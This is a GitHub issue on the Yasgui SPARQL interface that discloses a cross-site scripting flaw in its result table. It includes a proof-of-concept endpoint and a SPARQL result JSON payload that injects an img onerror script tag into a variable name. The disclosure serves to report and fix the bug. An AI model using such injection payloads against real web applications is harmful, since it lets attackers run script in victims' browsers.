search

TriplyDB / Yasgui

Yet Another Sparql GUI
https://yasgui.triply.cc
MIT License
178 stars 54 forks source link

Cross-Site Scripting (XSS) vulnerability in YASGUI result set table #221

Open ktk opened 1 year ago

ktk commented 1 year ago

Same source as in #220

The company has discovered a potential Cross-Site Scripting (XSS) vulnerability in YASGUI. The vulnerability is caused by the way YASGUI handles the SPARQL result set JSON returned by a malicious endpoint URL. Specifically, the SPARQL result set JSON can be abused to execute JavaScript code and trigger an XSS attack on the web application.

To reproduce the vulnerability, the following endpoint URL can be used:

https://rtp7.ch/sparql_poc.php

This endpoint URL contains a payload that includes an unescaped HTML code that can be used to execute JavaScript code and trigger an XSS attack. The payload is as follows:

{"head":{"vars":["subs<img src=x onerror=alert('XSS') >a","pred","obj"]},"results":{"bindings":[{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#label"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#comment"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#range"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#seeAlso"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subPropertyOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Class"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#domain"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Resource"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subClassOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}}]}}